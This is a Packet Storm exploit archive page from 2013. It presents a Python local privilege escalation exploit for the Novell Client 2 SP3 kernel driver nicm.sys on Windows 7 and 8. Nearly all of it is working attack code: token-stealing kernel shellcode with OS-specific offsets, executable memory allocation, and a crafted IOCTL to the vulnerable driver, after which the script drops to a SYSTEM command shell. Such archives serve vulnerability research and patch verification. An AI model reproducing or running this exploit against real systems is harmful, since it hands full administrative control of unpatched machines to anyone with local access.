what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Client 2 SP3 Privilege Escalation

Novell Client 2 SP3 Privilege Escalation
Posted Jul 29, 2013
Authored by sickness

Novell Client 2 SP3 suffers from a privilege escalation vulnerability.

tags | exploit
advisories | OSVDB-93718
SHA-256 | 90372d883442b6991b9af375b8d05bbaa5c31c066b8a21018779b94badc3881d

Novell Client 2 SP3 Privilege Escalation

Change Mirror Download
# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)

# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/

from ctypes import *
import sys,struct,os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll = windll.ntdll

if __name__ == '__main__':

usage = "%prog -o <target>"
parser = OptionParser(usage=usage)
parser.add_option("-o", type="string",
action="store", dest="target_os",
help="Available target operating systems: WIN7, WIN8")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['WIN7','WIN8']:
parser.print_help()
sys.exit()
OS = OS.upper()

if OS == "WIN7":
_KPROCESS = "\x50" # Offset for Win7
_TOKEN = "\xf8" # Offset for Win7
_UPID = "\xb4" # Offset for Win7
_APLINKS = "\xb8" # Offset for Win7

steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"

sc = steal_token

else:
_KPROCESS = "\x80" # Offset for Win8
_TOKEN = "\xEC" # Offset for Win8
_UPID = "\xB4" # Offset for Win8
_APLINKS = "\xB8" # Offset for Win8

steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"

sc = steal_token


kernel_sc = "\x14\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x18\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x28\x00\x0d\x0d"
kernel_sc+= sc


print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print "[>] Finding the driver."

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE = '\\\\.\\nicm'

device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
retn = c_ulong()

inut_buffer = 0x0d0d0000
inut_size = 0x14
output_buffer = 0x0
output_size = 0x0

baseadd = c_int(0x0d0d0000)

MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zero_Bits = c_int(0)
RegionSize = c_int(0x1000)
write = c_int(0)

print "[>] Allocating memory for our shellcode."
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
print "[>] Writing the shellcode."
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))

if device_handler:
print "[>] Sending IOCTL to the driver."
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)

print "[>] Dropping to a SYSTEM shell."
os.system("cmd.exe /K cd C:\\windows\\system32")


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close